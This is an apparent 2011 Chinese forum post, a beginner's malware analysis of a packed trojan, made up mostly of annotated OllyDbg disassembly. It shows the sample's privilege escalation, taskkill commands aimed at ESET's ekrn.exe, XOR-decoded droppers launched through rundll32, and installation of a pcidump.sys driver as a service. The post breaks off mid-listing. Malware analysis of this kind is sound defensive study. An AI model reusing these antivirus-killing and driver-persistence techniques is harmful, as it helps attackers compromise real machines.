对一款小木马的分析 by 曹无咎[LSG]
本帖最后由 曹无咎 于 2011-9-17 23:05 编辑文章标题:对一款启发式小木马的分析
所用工具:OD,PEid
时间:2011.3.29
样本:见附件
菜鸟对一款小木马的分析,算是第一次分析吧,失误之处还请同学们指正
感谢52pojie,感谢LSG(怎么说呢,浑浑噩噩的加入了LSG,一个月来,没有任何分析,徒挂虚衔),感谢各路大婶。好了废话不多说,开始分析:
1.这款木马加了一个压缩壳(upx),一般木马病毒是不会加加密壳的(增大了体积),脱壳esp定律就可搞定
2.到达OEP(402230)后,先观察入口,会看到一些很明显的函数了,现在我们来分析下,这个木马都实现了哪些操作:
首先,创建一个名为TGame...的互斥变量:
00402230 81EC 680B0000 sub esp, 0B68
00402236 53 push ebx
00402237 55 push ebp
00402238 56 push esi
00402239 57 push edi
0040223A B9 3F000000 mov ecx, 3F
0040223F 33C0 xor eax, eax
00402241 8DBC24 74050000 lea edi, dword ptr
00402248 68 E0134000 push 004013E0 ; ASCII "TGmae..."
0040224D F3:AB rep stos dword ptr es:
0040224F 66:AB stos word ptr es:
00402251 AA stos byte ptr es:
00402252 B9 3F000000 mov ecx, 3F
00402257 33C0 xor eax, eax
00402259 8DBC24 78070000 lea edi, dword ptr
00402260 B3 5C mov bl, 5C
00402262 F3:AB rep stos dword ptr es:
00402264 66:AB stos word ptr es:
00402266 AA stos byte ptr es:
00402267 B9 3F000000 mov ecx, 3F
0040226C 33C0 xor eax, eax
0040226E 8DBC24 78060000 lea edi, dword ptr
00402275 6A 00 push 0
00402277 F3:AB rep stos dword ptr es:
00402279 66:AB stos word ptr es:
0040227B AA stos byte ptr es:
0040227C B9 3F000000 mov ecx, 3F
00402281 33C0 xor eax, eax
00402283 8D7C24 78 lea edi, dword ptr
00402287 6A 00 push 0
00402289 F3:AB rep stos dword ptr es:
0040228B 66:AB stos word ptr es:
0040228D 885C24 24 mov byte ptr , bl
00402291 C64424 25 45 mov byte ptr , 45
00402296 C64424 26 78 mov byte ptr , 78
0040229B C64424 27 70 mov byte ptr , 70
004022A0 C64424 28 6C mov byte ptr , 6C
004022A5 C64424 29 6F mov byte ptr , 6F
004022AA C64424 2A 72 mov byte ptr , 72
004022AF C64424 2B 65 mov byte ptr , 65
004022B4 C64424 2C 72 mov byte ptr , 72
004022B9 C64424 2D 2E mov byte ptr , 2E
004022BE C64424 2E 45 mov byte ptr , 45
004022C3 C64424 2F 58 mov byte ptr , 58
004022C8 C64424 30 45 mov byte ptr , 45
004022CD C64424 31 00 mov byte ptr , 0
004022D2 AA stos byte ptr es:
004022D3 FF15 84104000 call dword ptr 创建互斥变量
004022D9 FF15 80104000 call dword ptr 获取最后一次错误
3.获取WINDOWS路径,并连接之,得到路径 C:\WINDOWS\Explorer.EXE:
004022EE 8B35 7C104000 mov esi, dword ptr 获取WINDOWS路径
004022F4 8D8424 74060000 lea eax, dword ptr
004022FB 68 FF000000 push 0FF
00402300 50 push eax
00402301 FFD6 call esi
00402303 8D8C24 74050000 lea ecx, dword ptr
0040230A 68 FF000000 push 0FF
0040230F 51 push ecx
00402310 FFD6 call esi
00402312 8B35 94104000 mov esi, dword ptr 字符串连接,得到C:\WINDOWS\Explorer.EXE
00402318 8D5424 18 lea edx, dword ptr
0040231C 8D8424 74050000 lea eax, dword ptr
00402323 52 push edx
00402324 50 push eax
00402325 FFD6 call esi
4.获取系统路径C:\WINDOWS\SYSTEM32
0040232E 68 FF000000 push 0FF
00402333 51 push ecx
00402334 885C24 4C mov byte ptr , bl
00402338 C64424 4D 74 mov byte ptr , 74
0040233D C64424 4E 65 mov byte ptr , 65
00402342 C64424 4F 6D mov byte ptr , 6D
00402347 C64424 50 70 mov byte ptr , 70
0040234C 885C24 51 mov byte ptr , bl
00402350 C64424 52 45 mov byte ptr , 45
00402355 C64424 53 78 mov byte ptr , 78
0040235A C64424 54 70 mov byte ptr , 70
0040235F C64424 55 6C mov byte ptr , 6C
00402364 C64424 56 6F mov byte ptr , 6F
00402369 C64424 57 72 mov byte ptr , 72
0040236E C64424 58 65 mov byte ptr , 65
00402373 C64424 59 72 mov byte ptr , 72
00402378 C64424 5A 2E mov byte ptr , 2E
0040237D C64424 5B 65 mov byte ptr , 65
00402382 C64424 5C 78 mov byte ptr , 78
00402387 C64424 5D 65 mov byte ptr , 65
0040238C C64424 5E 00 mov byte ptr , 0
00402391 FF15 90104000 call dword ptr 获取系统目录
00402397 8D5424 70 lea edx, dword ptr
5.获取相应模块的完整路径信息:
004023F1 FF15 58104000 call dword ptr GetModuleFileNameA
6.跳转到00402469,获取系统权限
00402469 E8 D2F9FFFF call 00401E40 此为获取函数
{
00401E40 83EC 14 sub esp, 14
00401E43 8D4424 00 lea eax, dword ptr
00401E47 50 push eax
00401E48 6A 28 push 28
00401E4A FF15 6C104000 call dword ptr 获取当前运行的进程
00401E50 50 push eax
00401E51 FF15 20104000 call dword ptr 遍历进程
00401E57 85C0 test eax, eax
00401E59 0F95C0 setne al
00401E5C 84C0 test al, al
00401E5E 75 04 jnz short 00401E64
00401E60 83C4 14 add esp, 14
00401E63 C3 retn
00401E64 8D4C24 08 lea ecx, dword ptr
00401E68 51 push ecx
00401E69 68 5C134000 push 0040135C 检测进程句柄
00401E6E 6A 00 push 0
00401E70 FF15 1C104000 call dword ptr ; ADVAPI32.LookupPrivilegeValueA
00401E76 85C0 test eax, eax
00401E78 0F95C0 setne al
00401E7B 84C0 test al, al
00401E7D 75 04 jnz short 00401E83
00401E7F 83C4 14 add esp, 14
00401E82 C3 retn
00401E83 8B4424 00 mov eax, dword ptr
00401E87 6A 00 push 0
00401E89 6A 00 push 0
00401E8B 8D5424 0C lea edx, dword ptr
00401E8F 6A 10 push 10
00401E91 52 push edx
00401E92 6A 00 push 0
00401E94 50 push eax
00401E95 C74424 1C 01000>mov dword ptr , 1
00401E9D C74424 28 02000>mov dword ptr , 2
00401EA5 FF15 18104000 call dword ptr ; ADVAPI32.AdjustTokenPrivileges
00401EAB 85C0 test eax, eax
00401EAD 0F95C0 setne al
00401EB0 83C4 14 add esp, 14
00401EB3 C3 retn
}
7.开始干杀软了,主要是干掉eset:
00402490 E8 DBF4FFFF call 00401970 干杀软函数
{
00401970 83EC 58 sub esp, 58
00401973 53 push ebx
00401974 B3 63 mov bl, 63
00401976 B0 20 mov al, 20
00401978 B2 2F mov dl, 2F
0040197A B1 65 mov cl, 65
0040197C 885C24 04 mov byte ptr , bl
00401980 C64424 05 6D mov byte ptr , 6D
00401985 C64424 06 64 mov byte ptr , 64
0040198A 884424 07 mov byte ptr , al
0040198E 885424 08 mov byte ptr , dl
00401992 885C24 09 mov byte ptr , bl
00401996 884424 0A mov byte ptr , al
0040199A C64424 0B 73 mov byte ptr , 73
0040199F 885C24 0C mov byte ptr , bl
004019A3 884424 0D mov byte ptr , al
004019A7 C64424 0E 64 mov byte ptr , 64
004019AC 884C24 0F mov byte ptr , cl
004019B0 C64424 10 6C mov byte ptr , 6C
004019B5 884C24 11 mov byte ptr , cl
004019B9 C64424 12 74 mov byte ptr , 74
004019BE 884C24 13 mov byte ptr , cl
004019C2 884424 14 mov byte ptr , al
004019C6 884C24 15 mov byte ptr , cl
004019CA C64424 16 6B mov byte ptr , 6B
004019CF C64424 17 72 mov byte ptr , 72
004019D4 C64424 18 6E mov byte ptr , 6E
004019D9 C64424 19 00 mov byte ptr , 0
004019DE 885C24 1C mov byte ptr , bl
004019E2 C64424 1D 6D mov byte ptr , 6D
004019E7 C64424 1E 64 mov byte ptr , 64
004019EC 884424 1F mov byte ptr , al
004019F0 885424 20 mov byte ptr , dl
004019F4 885C24 21 mov byte ptr , bl
004019F8 884424 22 mov byte ptr , al
004019FC C64424 23 74 mov byte ptr , 74
00401A01 C64424 24 61 mov byte ptr , 61
00401A06 C64424 25 73 mov byte ptr , 73
00401A0B C64424 26 6B mov byte ptr , 6B
00401A10 C64424 27 6B mov byte ptr , 6B
00401A15 C64424 28 69 mov byte ptr , 69
00401A1A C64424 29 6C mov byte ptr , 6C
00401A1F C64424 2A 6C mov byte ptr , 6C
00401A24 884424 2B mov byte ptr , al
00401A28 885424 2C mov byte ptr , dl
00401A2C C64424 2D 69 mov byte ptr , 69
00401A31 C64424 2E 6D mov byte ptr , 6D
00401A36 884424 2F mov byte ptr , al
00401A3A 884C24 30 mov byte ptr , cl
00401A3E C64424 31 6B mov byte ptr , 6B
00401A43 C64424 32 72 mov byte ptr , 72
00401A48 C64424 33 6E mov byte ptr , 6E
00401A4D C64424 34 2E mov byte ptr , 2E
00401A52 884C24 35 mov byte ptr , cl
00401A56 C64424 36 78 mov byte ptr , 78
00401A5B 884C24 37 mov byte ptr , cl
00401A5F 884424 38 mov byte ptr , al
00401A63 885424 39 mov byte ptr , dl
00401A67 C64424 3A 66 mov byte ptr , 66
00401A6C 885C24 3C mov byte ptr , bl
00401A70 C64424 3D 6D mov byte ptr , 6D
00401A75 C64424 3E 64 mov byte ptr , 64
00401A7A 884424 3F mov byte ptr , al
00401A7E 885424 40 mov byte ptr , dl
00401A82 885C24 41 mov byte ptr , bl
00401A86 884424 42 mov byte ptr , al
00401A8A C64424 43 74 mov byte ptr , 74
00401A8F C64424 44 61 mov byte ptr , 61
00401A94 C64424 45 73 mov byte ptr , 73
00401A99 C64424 46 6B mov byte ptr , 6B
00401A9E C64424 47 6B mov byte ptr , 6B
00401AA3 C64424 48 69 mov byte ptr , 69
00401AA8 C64424 49 6C mov byte ptr , 6C
00401AAD C64424 4A 6C mov byte ptr , 6C
00401AB2 884424 4B mov byte ptr , al
00401AB6 885424 4C mov byte ptr , dl
00401ABA C64424 4D 69 mov byte ptr , 69
00401ABF C64424 4E 6D mov byte ptr , 6D
00401AC4 884424 4F mov byte ptr , al
00401AC8 884C24 50 mov byte ptr , cl
00401ACC C64424 51 67 mov byte ptr , 67
00401AD1 C64424 52 75 mov byte ptr , 75
00401AD6 68 D0124000 push 004012D0 ; ASCII "ekrn.exe"
00401ADB C64424 57 69 mov byte ptr , 69
00401AE0 C64424 58 2E mov byte ptr , 2E
00401AE5 884C24 59 mov byte ptr , cl
00401AE9 C64424 5A 78 mov byte ptr , 78
00401AEE 884C24 5B mov byte ptr , cl
00401AF2 884424 5C mov byte ptr , al
00401AF6 885424 5D mov byte ptr , dl
00401AFA C64424 5E 66 mov byte ptr , 66
00401AFF E8 ECFDFFFF call 004018F0 遍历系统进程
即 createtoolhelp32snapshot
process32first
process32next
00401B04 83C4 04 add esp, 4
00401B07 85C0 test eax, eax
00401B09 5B pop ebx
00401B0A 74 5C je short 00401B68 系统裸奔,所以跳走了,安装eset的可以继续跟踪
00401B0C 6A 00 push 0
00401B0E 6A 00 push 0
00401B10 8D4424 08 lea eax, dword ptr
00401B14 68 E4104000 push 004010E4
00401B19 50 push eax
00401B1A 68 C8124000 push 004012C8 ; ASCII "open"
00401B1F 6A 00 push 0
00401B21 E8 1AF9FFFF call 00401440
00401B26 6A 00 push 0
00401B28 6A 00 push 0
00401B2A 8D4C24 38 lea ecx, dword ptr
00401B2E 68 E4104000 push 004010E4
00401B33 51 push ecx
00401B34 68 C8124000 push 004012C8 ; ASCII "open"
00401B39 6A 00 push 0
00401B3B E8 00F9FFFF call 00401440
00401B40 6A 00 push 0
00401B42 6A 00 push 0
00401B44 8D5424 70 lea edx, dword ptr
00401B48 68 E4104000 push 004010E4
00401B4D 52 push edx
00401B4E 68 C8124000 push 004012C8 ; ASCII "open"
00401B53 6A 00 push 0
00401B55 E8 E6F8FFFF call 00401440
00401B5A 83C4 48 add esp, 48
00401B5D 68 F4010000 push 1F4
00401B62 FF15 9C104000 call dword ptr ; kernel32.Sleep
00401B68 83C4 58 add esp, 58
00401B6B C3 retn
}
8.开始生成文件:
0040249C E8 3FF8FFFF call 00401CE0
call进去看看:
{
00401CE0 81EC 54030000 sub esp, 354
00401CE6 53 push ebx
00401CE7 56 push esi
00401CE8 57 push edi
00401CE9 B9 3F000000 mov ecx, 3F
00401CEE 33C0 xor eax, eax
00401CF0 8D7C24 60 lea edi, dword ptr
00401CF4 F3:AB rep stos dword ptr es:
00401CF6 66:AB stos word ptr es:
00401CF8 AA stos byte ptr es:
00401CF9 B9 3F000000 mov ecx, 3F
00401CFE 33C0 xor eax, eax
00401D00 8DBC24 60020000 lea edi, dword ptr
00401D07 F3:AB rep stos dword ptr es:
00401D09 66:AB stos word ptr es:
00401D0B AA stos byte ptr es:
00401D0C B9 3F000000 mov ecx, 3F
00401D11 33C0 xor eax, eax
00401D13 8DBC24 60010000 lea edi, dword ptr
00401D1A F3:AB rep stos dword ptr es:
00401D1C 66:AB stos word ptr es:
00401D1E AA stos byte ptr es:
00401D1F FF15 68104000 call dword ptr 获取系统启动时间
00401D25 50 push eax
00401D26 8D8424 64020000 lea eax, dword ptr
00401D2D 68 54134000 push 00401354 ; ASCII "%d.dll"
00401D32 50 push eax
00401D33 FF15 DC104000 call dword ptr 由此可知,依据洗头膏运行的时间生成dll的名字,也就是说,这个dll的名字是动态的了
00401D39 83C4 0C add esp, 0C
00401D3C 8D4C24 60 lea ecx, dword ptr
00401D40 51 push ecx
00401D41 68 FF000000 push 0FF
00401D46 FF15 AC104000 call dword ptr 获取temp路径
00401D4C 8B35 94104000 mov esi, dword ptr 字符串连接函数
00401D52 8D9424 60020000 lea edx, dword ptr 2128328.dll
00401D59 8D4424 60 lea eax, dword ptr C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp
00401D5D 52 push edx
00401D5E 50 push eax
00401D5F FFD6 call esi 连接字符串生成: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\2128328.dll
00401D61 8D4C24 60 lea ecx, dword ptr
00401D65 6A 66 push 66
00401D67 51 push ecx
00401D68 E8 C3FAFFFF call 00401830 在上述路径中生成dll
到00401830这个函数里面看看
{
00401830 55 push ebp
00401831 8BEC mov ebp, esp
00401833 83EC 0C sub esp, 0C
00401836 8B4D 08 mov ecx, dword ptr
00401839 A1 C4124000 mov eax, dword ptr
0040183E 6A 00 push 0
00401840 6A 00 push 0
00401842 6A 02 push 2
00401844 6A 00 push 0
00401846 6A 00 push 0
00401848 68 00000040 push 40000000
0040184D 51 push ecx
0040184E 8945 FC mov dword ptr , eax
00401851 FF15 88104000 call dword ptr 生成2128328.dll
00401857 85C0 test eax, eax
00401859 8945 F4 mov dword ptr , eax
0040185C 0F84 82000000 je 004018E4
00401862 8B45 0C mov eax, dword ptr
00401865 53 push ebx
00401866 56 push esi
00401867 8D55 FC lea edx, dword ptr
0040186A 57 push edi
0040186B 52 push edx
0040186C 50 push eax
0040186D 6A 00 push 0
0040186F FF15 40104000 call dword ptr 寻找资源
00401875 8BF8 mov edi, eax
00401877 57 push edi
00401878 6A 00 push 0
0040187A FF15 3C104000 call dword ptr 加载资源
00401880 50 push eax
00401881 8945 0C mov dword ptr , eax
00401884 33F6 xor esi, esi
00401886 FF15 38104000 call dword ptr 获取变量的内存地址
0040188C 8BD8 mov ebx, eax
0040188E C645 0B 00 mov byte ptr , 0
00401892 90 nop
00401893 57 push edi
00401894 56 push esi
00401895 FF15 34104000 call dword ptr 返回资源大小
0040189B 85C0 test eax, eax
0040189D 74 2E je short 004018CD
0040189F 90 nop
004018A0 8A0C33 mov cl, byte ptr
004018A3 8D55 F8 lea edx, dword ptr
004018A6 80F1 06 xor cl, 6
004018A9 6A 00 push 0
004018AB 884D 0B mov byte ptr , cl
004018AE 8B4D F4 mov ecx, dword ptr
004018B1 52 push edx
004018B2 8D45 0B lea eax, dword ptr
004018B5 6A 01 push 1
004018B7 50 push eax
004018B8 51 push ecx
004018B9 FF15 30104000 call dword ptr 写文件
004018BF 57 push edi
004018C0 6A 00 push 0
004018C2 46 inc esi
004018C3 FF15 34104000 call dword ptr 返回资源大小
004018C9 3BF0 cmp esi, eax
004018CB^ 72 D3 jb short 004018A0
004018CD 8B55 0C mov edx, dword ptr
004018D0 52 push edx
004018D1 FF15 2C104000 call dword ptr 释放资源
004018D7 8B45 F4 mov eax, dword ptr
004018DA 50 push eax
004018DB FF15 64104000 call dword ptr 关闭句柄
004018E1 5F pop edi
004018E2 5E pop esi
004018E3 5B pop ebx
004018E4 8BE5 mov esp, ebp
004018E6 5D pop ebp
004018E7 C2 0800 retn 8
}
00401D6D 8B1D 8C104000 mov ebx, dword ptr ; kernel32.lstrcpyA
00401D73 8D5424 60 lea edx, dword ptr
00401D77 8D8424 60010000 lea eax, dword ptr
00401D7E 52 push edx
00401D7F 50 push eax
00401D80 FFD3 call ebx
00401D82 8D4C24 60 lea ecx, dword ptr
00401D86 68 48134000 push 00401348 ; ASCII " testall"
00401D8B 51 push ecx
00401D8C FFD6 call esi
00401D8E B9 3F000000 mov ecx, 3F
00401D93 33C0 xor eax, eax C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\2128328.dll testall
00401D95 8DBC24 60010000 lea edi, dword ptr
00401D9C 8D9424 60010000 lea edx, dword ptr
00401DA3 F3:AB rep stos dword ptr es:
00401DA5 66:AB stos word ptr es:
00401DA7 68 38134000 push 00401338 用rundll32.exe加载此dll
00401DAC 52 push edx
00401DAD AA stos byte ptr es:
00401DAE FFD3 call ebx
00401DB0 8D4424 60 lea eax, dword ptr
00401DB4 8D8C24 60010000 lea ecx, dword ptr
00401DBB 50 push eax
00401DBC 51 push ecx
00401DBD FFD6 call esi
00401DBF B9 11000000 mov ecx, 11
00401DC4 33C0 xor eax, eax
00401DC6 8D7C24 1C lea edi, dword ptr
00401DCA 8D5424 0C lea edx, dword ptr
00401DCE F3:AB rep stos dword ptr es:
00401DD0 8D4C24 1C lea ecx, dword ptr
00401DD4 52 push edx
00401DD5 51 push ecx
00401DD6 C74424 24 44000>mov dword ptr , 44
00401DDE 894424 50 mov dword ptr , eax
00401DE2 66:C74424 54 05>mov word ptr , 5
00401DE9 894424 60 mov dword ptr , eax
00401DED 894424 64 mov dword ptr , eax
00401DF1 50 push eax
00401DF2 50 push eax
00401DF3 50 push eax
00401DF4 6A 01 push 1
00401DF6 50 push eax
00401DF7 8D9424 7C010000 lea edx, dword ptr
00401DFE 50 push eax
00401DFF 52 push edx
00401E00 50 push eax
00401E01 FF15 60104000 call dword ptr 创建一个进程
{
0012F134 00000000|ModuleFileName = NULL
0012F138 0012F2BC|CommandLine = "rundll32.exe C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\2128328.dll testall"
0012F13C 00000000|pProcessSecurity = NULL
0012F140 00000000|pThreadSecurity = NULL
0012F144 00000001|InheritHandles = TRUE
0012F148 00000000|CreationFlags = 0
0012F14C 00000000|pEnvironment = NULL
0012F150 00000000|CurrentDir = NULL
0012F154 0012F178|pStartupInfo = 0012F178
0012F158 0012F168\pProcessInfo = 0012F168
}
00401E07 5F pop edi
00401E08 5E pop esi
00401E09 85C0 test eax, eax
00401E0B 5B pop ebx
00401E0C 74 18 je short 00401E26
00401E0E 8B4424 04 mov eax, dword ptr
00401E12 50 push eax
00401E13 FF15 64104000 call dword ptr 关闭句柄
00401E19 8B4C24 00 mov ecx, dword ptr
00401E1D 6A FF push -1
00401E1F 51 push ecx
00401E20 FF15 5C104000 call dword ptr WaitForSingleObject(检测handle是否还存在)
00401E26 8D9424 54010000 lea edx, dword ptr
00401E2D 52 push edx
00401E2E FF15 A0104000 call dword ptr 删除文件
{
0012F164 0012F2BC\FileName = "rundll32.exe C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\2128328.dll testall"
}
00401E34 81C4 54030000 add esp, 354
00401E3A C3 retn
}
9.继续向下分析(继续生成文件):
004024DA 50 push eax
004024DB FF15 90104000 call dword ptr 获取系统路径
004024E1 FF15 68104000 call dword ptr 获取系统启动时间,估计是要生成文件了
004024E7 50 push eax
004024E8 8D8C24 78090000 lea ecx, dword ptr
004024EF 68 D8134000 push 004013D8 ; ASCII "%d.exe"
004024F4 51 push ecx
004024F5 FF15 DC104000 call dword ptr ; USER32.wsprintfA
004024FB 83C4 0C add esp, 0C
004024FE 8D9424 70030000 lea edx, dword ptr
00402505 68 D4134000 push 004013D4
0040250A 52 push edx
0040250B FFD6 call esi 生成一个名为3412296.exe的可执行文件
生成的3412296.exe存放在C:\WINDOWS\system32\3412296.exe此为路径
0040250D 8D8424 74090000 lea eax, dword ptr
00402514 8D8C24 70030000 lea ecx, dword ptr
0040251B 50 push eax
0040251C 51 push ecx
0040251D FFD6 call esi
0040251F 8D9424 70030000 lea edx, dword ptr
00402526 6A 65 push 65
00402528 52 push edx
00402529 E8 02F3FFFF call 00401830 同理这个call是生成文件,上面已经分析过了,这里不详细分析了哈
0040252E 6A 00 push 0
00402530 6A 00 push 0
00402532 8D8424 78030000 lea eax, dword ptr
00402539 68 E4104000 push 004010E4
0040253E 50 push eax
0040253F 68 C8124000 push 004012C8 ; ASCII "open"
00402544 6A 00 push 0
00402546 E8 F5EEFFFF call 00401440 加载库文件,call进去看看
{
00401440 56 push esi
00401441 68 A0124000 push 004012A0 ; ASCII "shell32.dll"
00401446 FF15 A4104000 call dword ptr LoadLibraryA
0040144C 8BF0 mov esi, eax ; shell32.#599
0040144E 68 90124000 push 00401290 ; ASCII "ShellExecuteA"
00401453 56 push esi
00401454 FF15 A8104000 call dword ptr ; kernel32.GetProcAddress
0040145A 85C0 test eax, eax
0040145C 74 27 je short 00401485
0040145E 8B4C24 1C mov ecx, dword ptr
00401462 8B5424 18 mov edx, dword ptr
00401466 51 push ecx
00401467 8B4C24 18 mov ecx, dword ptr
0040146B 52 push edx
0040146C 8B5424 18 mov edx, dword ptr
00401470 51 push ecx
00401471 8B4C24 18 mov ecx, dword ptr
00401475 52 push edx
00401476 8B5424 18 mov edx, dword ptr
0040147A 51 push ecx
0040147B 52 push edx
0040147C FFD0 call eax ShellExecute的功能是运行一个外部程序这里是运行刚刚生成的文件了
0040147E 56 push esi
0040147F FF15 B0104000 call dword ptr ; kernel32.FreeLibrary
00401485 5E pop esi
00401486 C3 retn
}
10.接下来开始生成驱动文件了(生成一个名为pcidump.sys的驱动文件):
生成路径为:
C:\WINDOWS\system32\drivers\pcidump.sys
00402659 6A 67 push 67
0040265B 52 push edx
0040265C E8 CFF1FFFF call 00401830 又见此函数,你懂的 ,这里就不call进去看了,生成驱动文件
00402661 8D8424 70020000 lea eax, dword ptr
00402668 50 push eax
00402669 E8 22EEFFFF call 00401490 开始做坏事了,传说中的启发式,哈哈,创建后门
{
00401490 55 push ebp
00401491 8BEC mov ebp, esp
00401493 83EC 24 sub esp, 24
00401496 56 push esi
00401497 68 3F000F00 push 0F003F
0040149C B0 70 mov al, 70
0040149E 6A 00 push 0
004014A0 6A 00 push 0
004014A2 8845 F8 mov byte ptr , al
004014A5 C645 F9 63 mov byte ptr , 63
004014A9 C645 FA 69 mov byte ptr , 69
004014AD C645 FB 64 mov byte ptr , 64
004014B1 C645 FC 75 mov byte ptr , 75
004014B5 C645 FD 6D mov byte ptr , 6D
004014B9 8845 FE mov byte ptr , al
004014BC C645 FF 00 mov byte ptr , 0
004014C0 FF15 14104000 call dword ptr 打开服务管理器
004014C6 8BF0 mov esi, eax
004014C8 85F6 test esi, esi
004014CA 0F84 CD000000 je 0040159D
004014D0 53 push ebx
004014D1 57 push edi
004014D2 90 nop
004014D3 8B5D 08 mov ebx, dword ptr
004014D6 6A 00 push 0
004014D8 6A 00 push 0
004014DA 6A 00 push 0
004014DC 6A 00 push 0
004014DE 6A 00 push 0
004014E0 53 push ebx
004014E1 6A 00 push 0
004014E3 6A 03 push 3
004014E5 6A 01 push 1
004014E7 8D45 F8 lea eax, dword ptr
004014EA 68 FF010F00 push 0F01FF
004014EF 8D4D F8 lea ecx, dword ptr
004014F2 50 push eax
004014F3 51 push ecx
004014F4 56 push esi
004014F5 FF15 10104000 call dword ptr 创建服务
004014FB 85C0 test eax, eax
004014FD 75 5A jnz short 00401559
004014FF 8D55 F8 lea edx, dword ptr
00401502 68 FF010F00 push 0F01FF
00401507 52 push edx
00401508 56 push esi
00401509 FF15 0C104000 call dword ptr 打开服务
0040150F 8BF8 mov edi, eax
00401511 85FF test edi, edi
00401513 74 1B je short 00401530
00401515 8D45 DC lea eax, dword ptr
00401518 50 push eax
00401519 6A 01 push 1
0040151B 57 push edi
0040151C FF15 08104000 call dword ptr 控制服务
00401522 57 push edi
00401523 FF15 04104000 call dword ptr 删除服务
00401529 57 push edi
0040152A FF15 00104000 call dword ptr ; ADVAPI32.CloseServiceHandle关闭服务句柄
00401530 6A 00 push 0
00401532 6A 00 push 0
00401534 6A 00 push 0
00401536 6A 00 push 0
00401538 6A 00 push 0
0040153A 53 push ebx
0040153B 6A 00 push 0
0040153D 6A 03 push 3
0040153F 6A 01 push 1
00401541 8D4D F8 lea ecx, dword ptr
00401544 68 FF010F00 push 0F01FF
00401549 8D55 F8 lea edx, dword ptr
0040154C 51 push ecx
0040154D 52 push edx
0040154E 56 push esi
0040154F FF15 10104000 call dword ptr 创建服务
00401555 85C0 test eax, eax
00401557 74 33 je short 0040158C
00401559 50 push eax
0040155A FF15 00104000 call dword ptr 关闭服务句柄
00401560 8D45 F8 lea eax, dword ptr
00401563 6A 10 push 10
00401565 50 push eax
00401566 56 push esi
00401567 FF15 0C104000 call dword ptr 打开服务
0040156D 8BF8 mov edi, eax
0040156F 90 nop
00401570 85FF test edi, edi
00401572 74 18 je short 0040158C
00401574 90 nop
00401575 6A 00 push 0
00401577 6A 00 push 0
00401579 57 push edi
0040157A FF15 24104000 call dword ptr 启动服务
00401580 85C0 test eax, eax
00401582 75 07 jnz short 0040158B
00401584 57 push edi
00401585 FF15 00104000 call dword ptr 关闭
0040158B 90 nop
0040158C 56 push esi
0040158D FF15 00104000 call dword ptr 关闭
00401593 8B45 08 mov eax, dword ptr
00401596 5F pop edi
00401597 5B pop ebx
00401598 5E pop esi
00401599 8BE5 mov esp, ebp
0040159B 5D pop ebp
0040159C C3 retn
0040159D 8B45 08 mov eax, dword ptr
004015A0 5E pop esi
004015A1 8BE5 mov esp, ebp
004015A3 5D pop ebp
004015A4 C3 retn
}
11.继续分析,貌似又生成了什么东西,看:
004026D8 8D8424 74080000 lea eax, dword ptr \??\C:\WINDOWS\Explorer.EXE
004026DF 8D8C24 74040000 lea ecx, dword ptr
004026E6 50 push eax
004026E7 51 push ecx
004026E8 E8 63EFFFFF call 00401650 这个call也在做坏事,果断CALL进去
{
00401650 81EC 30020000 sub esp, 230
00401656 8A0D C0124000 mov cl, byte ptr
0040165C B0 5C mov al, 5C
0040165E 884424 00 mov byte ptr , al
00401662 884424 01 mov byte ptr , al
00401666 884424 03 mov byte ptr , al
0040166A B0 70 mov al, 70
0040166C 884424 04 mov byte ptr , al
00401670 884424 0A mov byte ptr , al
00401674 A1 BC124000 mov eax, dword ptr
00401679 57 push edi
0040167A 894424 1C mov dword ptr , eax
0040167E 884C24 20 mov byte ptr , cl
00401682 B9 3F000000 mov ecx, 3F
00401687 33C0 xor eax, eax
00401689 8D7C24 34 lea edi, dword ptr
0040168D 6A 00 push 0
0040168F F3:AB rep stos dword ptr es:
00401691 66:AB stos word ptr es:
00401693 AA stos byte ptr es:
00401694 B9 3F000000 mov ecx, 3F
00401699 33C0 xor eax, eax
0040169B 8DBC24 38010000 lea edi, dword ptr
004016A2 68 80000000 push 80
004016A7 F3:AB rep stos dword ptr es:
004016A9 6A 03 push 3
004016AB 6A 00 push 0
004016AD 66:AB stos word ptr es:
004016AF 6A 00 push 0
004016B1 8D5424 18 lea edx, dword ptr
004016B5 68 000000C0 push C0000000
004016BA 52 push edx
004016BB C64424 22 2E mov byte ptr , 2E
004016C0 C64424 25 63 mov byte ptr , 63
004016C5 C64424 26 69 mov byte ptr , 69
004016CA C64424 27 64 mov byte ptr , 64
004016CF C64424 28 75 mov byte ptr , 75
004016D4 C64424 29 6D mov byte ptr , 6D
004016D9 C64424 2B 00 mov byte ptr , 0
004016DE AA stos byte ptr es:
004016DF FF15 88104000 call dword ptr 生成刚刚的驱动文件pcidump
004016E5 8BF8 mov edi, eax
004016E7 85FF test edi, edi
004016E9 0F84 2D010000 je 0040181C
004016EF A0 78124000 mov al, byte ptr
004016F4 53 push ebx
004016F5 55 push ebp
004016F6 8BAC24 40020000 mov ebp, dword ptr
004016FD 56 push esi
004016FE 8B35 8C104000 mov esi, dword ptr ; kernel32.lstrcpyA
00401704 84C0 test al, al
00401706 0F84 A8000000 je 004017B4
0040170C 8B0D B0124000 mov ecx, dword ptr
00401712 A1 AC124000 mov eax, dword ptr
00401717 8B15 B4124000 mov edx, dword ptr
0040171D 894C24 34 mov dword ptr , ecx
00401721 894424 30 mov dword ptr , eax
00401725 A1 B8124000 mov eax, dword ptr
0040172A 8D8C24 40010000 lea ecx, dword ptr
00401731 68 FF000000 push 0FF
00401736 51 push ecx
00401737 895424 40 mov dword ptr , edx
0040173B 894424 44 mov dword ptr , eax
0040173F FF15 90104000 call dword ptr ; kernel32.GetSystemDirectoryA
00401745 8D5424 28 lea edx, dword ptr
00401749 8D4424 40 lea eax, dword ptr
0040174D 52 push edx
0040174E 50 push eax
0040174F FFD6 call esi
00401751 8B1D 94104000 mov ebx, dword ptr ; kernel32.lstrcatA
00401757 8D8C24 40010000 lea ecx, dword ptr
0040175E 8D5424 40 lea edx, dword ptr
00401762 51 push ecx
00401763 52 push edx
00401764 FFD3 call ebx
00401766 8D4424 30 lea eax, dword ptr
0040176A 8D4C24 40 lea ecx, dword ptr
0040176E 50 push eax
0040176F 51 push ecx
00401770 FFD3 call ebx "\??\C:\WINDOWS\system32\drivers\gm.dls"此路径
00401772 55 push ebp
00401773 68 E8104000 push 004010E8 ; ASCII "123321"
00401778 FFD6 call esi
0040177A 8D5424 40 lea edx, dword ptr
0040177E 52 push edx
0040177F 68 B0114000 push 004011B0
